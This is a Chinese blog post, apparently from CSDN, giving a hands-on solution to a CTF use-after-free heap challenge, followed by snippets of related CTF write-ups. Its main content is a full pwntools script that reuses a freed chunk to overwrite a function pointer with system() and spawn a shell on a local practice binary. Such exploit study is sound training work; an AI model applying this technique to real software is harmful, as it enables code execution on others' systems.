uaf漏洞例题

已于 2024-03-19 21:14:07 修改
阅读量531 收藏 4
点赞数 13
文章标签: 安全 web安全
于 2024-03-12 19:53:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79899078/article/details/136627059
版权

本文并不是详细讲解uaf漏洞及double free利用的,只是实操。

关于详细的uaf漏洞介绍及double free利用:关于堆的基本概念和uaf漏洞-CSDN博客

这里直接上题

代码审计:只能说五脏俱全 ,add,del,free全都有,典中点,宣~~~

这里还有system真的太宣了qwq

先写框架:

def add_chunk():
    io.recvuntil(b':')
    io.sendline(b'1')
 
 
def edit_chunk(index, string):
    io.recvuntil(':')
    io.sendline('2')
    io.recvuntil('page\n')
    io.sendline(str(index))
    io.recvuntil('strings\n')
    io.sendline(string)
 
 
def del_chunk(index):
    io.recvuntil(':')
    io.sendline('3')
    io.recvuntil('page\n')
    io.sendline(str(index))
 
 
def show_chunk(index):
    io.recvuntil(b':')
    io.sendline(b'4')
    io.recvuntil(b'page\n')
    io.sendline(str(index))

double free利用

先创建一个chunk 0
 由于edit不能直接编辑chunk0,因为 if ( v1 <= 0 || v1 > i )
这里我们要注意由于系统不会直接回收内存空间,并且free后并没有将指针置0,create函数创建的chunk是不能自定义的,但是我们只要free后再申请一次,它就会把之前的chunk给我们复用
由于我们不能直接编辑chunk0,但是chunk0现在被page1所调用,因此我们只需要使用edit写入page1 sh并show_page即可getshell

add_chunk()
del_chunk(0)
add_chunk()

构造system(/bin/sh)字符串

edit_chunk(1, b'sh;\x00' + p32(system))
 
show_chunk(0)
 
io.interactive()

这里一定要打印,一定要,不打印就会一直循环,这里不明白的可以看看程序。

完整脚本:
 

from pwn import *
io = process('./uaf')
elf = ELF('./uaf')
 
context(arch='i386', os='linux', log_level='debug')
 
system = 0x80484E0
 
 
def add_chunk():
    io.recvuntil(b':')
    io.sendline(b'1')
 
 
def edit_chunk(index, string):
    io.recvuntil(':')
    io.sendline('2')
    io.recvuntil('page\n')
    io.sendline(str(index))
    io.recvuntil('strings\n')
    io.sendline(string)
 
 
def del_chunk(index):
    io.recvuntil(':')
    io.sendline('3')
    io.recvuntil('page\n')
    io.sendline(str(index))
 
 
def show_chunk(index):
    io.recvuntil(b':')
    io.sendline(b'4')
    io.recvuntil(b'page\n')
    io.sendline(str(index))
 
 
 
add_chunk()
del_chunk(0)
add_chunk()
edit_chunk(1, b'sh;\x00' + p32(system))
 
show_chunk(0)
 
io.interactive()

我们跑一遍脚本就可以发现通了:

 

总结:以现在博🐖接触到的uaf来说,困难的不是原理,利用思路,难点在于代码的审计,毕竟博🐖学爪洼。。。,申请堆size时代码构造有困难,总的来说就到这里了。(会持续更新的)

           

諍宁
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 712
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 372
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
uaf-逻辑题-BUUCTF hacknote
csdn546229768的博客
11-28 328
首先拿到题目是个菜单题,在ida中进行手动识别重命名函数如图: 首先按照程序流程配合程序一起分析add函数如图: 通过上面分析可知,ptr_array是一个全局数组长度为5,然后进入if判断这个“*(&ptr_array + i)”也就是ptr_array[i]那么这就对每个数组里面的内容进行判空,那就是说这个数组里面的数据是否被add过。 然后就是给数组里面每个分配了一个大小为8byte的chunk实际分配是0x10,然后这句“**(&ptr_array + i) = m_puts”实
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 723
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块 这个示意图很清楚: ...
CTF pwn普通UAF题目模板
半岛铁盒的博客
06-15 485
from pwn import * context(log_level=‘debug’) elf=ELF(’./) r=remote("","") #r=process(’./’) def create(size,content): r.sendlineafter("Your choice: ",‘1’) r.sendlineafter("Please input size: ",str(size)) r.sendafter("Please input content: ",content) def del
未初始化UAF漏洞
04-26
未初始化的Use-After-Free(UAF漏洞是计算机安全领域中的一个重要概念,尤其是在软件开发和逆向工程中。这种漏洞通常发生在动态内存管理时,当一个已经释放的内存块在之后仍然被程序引用,导致意外的行为或数据...
FUZE:辅助生成内核UAF漏洞利用.pdf
08-08
通过15个Linux内核UAF漏洞组成的测试集,我们展示了FUZE不仅可以辅助内核UAF漏洞利用生成,还可以辅助一些内核缓解机制的绕过。 What are We Talking about? • Discuss the challenge of exploit development • ...
漏洞uaf1
08-04
漏洞uaf1 堆漏洞uaf1是指use after free(使用后释放)漏洞的一种形式,即程序释放了某个内存块,但在释放后还继续使用该内存块,导致程序崩溃或出现意外情况。这种漏洞可以被利用来控制程序的执行流程,例如...
深入分析Chrome浏览器textbook UAF漏洞 .pdf
09-05
Chrome浏览器的textbook Use-After-Free (UAF)漏洞是一种严重的安全问题,它涉及到WebAudio模块中的内存管理缺陷。在2020年3月,研究人员发现了一个非垃圾回收对象的UAF漏洞,该对象由PartitionAlloc内存分配器分配...
FIDO-UAF协议
12-30
FIDO-UAF协议官方文档,FIDO协议是目前国际范围内最火的统一认证协议
UAF原理及相关一道CTF
qq_36963214的博客
07-27 2651
前言 通过学习UAF原理及其在CTF中的应用,通过理论是实践相结合,可以更好地掌握UAF漏洞UAF漏洞原理 #include<stdio.h> #include<stdlib.h> int main() { char *p1, *p2; p1 = p2 = NULL; p1 = (char *)malloc(10); if (p1 == NULL) { printf("fail to malloc p1"); exit(1); } memcpy(p1, "
pwnable.kr题解之uaf
Yale的博客
06-19 574
前言: 这道题目反应了uaf的基本原理,pwn入门必做的题目,如果这一块了解的不够透彻,直接去打现在涉及各种奇技淫巧的pwn,肯定会被绕晕掉。所以为了照顾萌新(其实是我自己菜)把这道题目单独拿出来写一下。 这是一道uaf的题目,把二进制文件拉到本地来研究 在分析前,先简单说一下c++的虚函数和uaf的前置知识 在c++中,如果类中有虚函数,那么这个类就会有一个虚函数表的指针vfptr,而子类会继承。 uaf的原理: 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释
pwnable.kr之uaf
river
05-26 8209
uaf 终于有时间写一下了,这个题目的答案百度了一下,貌似没有什么特别详细的解答,都是大神们的writeup,可能觉得太简单了,几句话就完事了,而我这种渣渣,只能从头学习,那里不会学哪里。新手可以一起学习一下,如果有兴趣一起学习pwn的可以留言,一起进步, 不扯了,开始正事!   uaf漏洞分析基础知识补充: 1 UAF:引用一段被释放的内存可导致程序崩溃,或处理非预期数值,或执行无干
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
2019安恒一月PWN题目题目
weixin_41293827的博客
02-26 969
链接:https://pan.baidu.com/s/1bQtCIPGeLvLSgmtJfBTKIg 提取码:30be
AI安全系列——[第五空间 2022]AI(持续更新)
最新发布
2201_76139143的博客
07-15 718
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1301
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 368
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 553
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值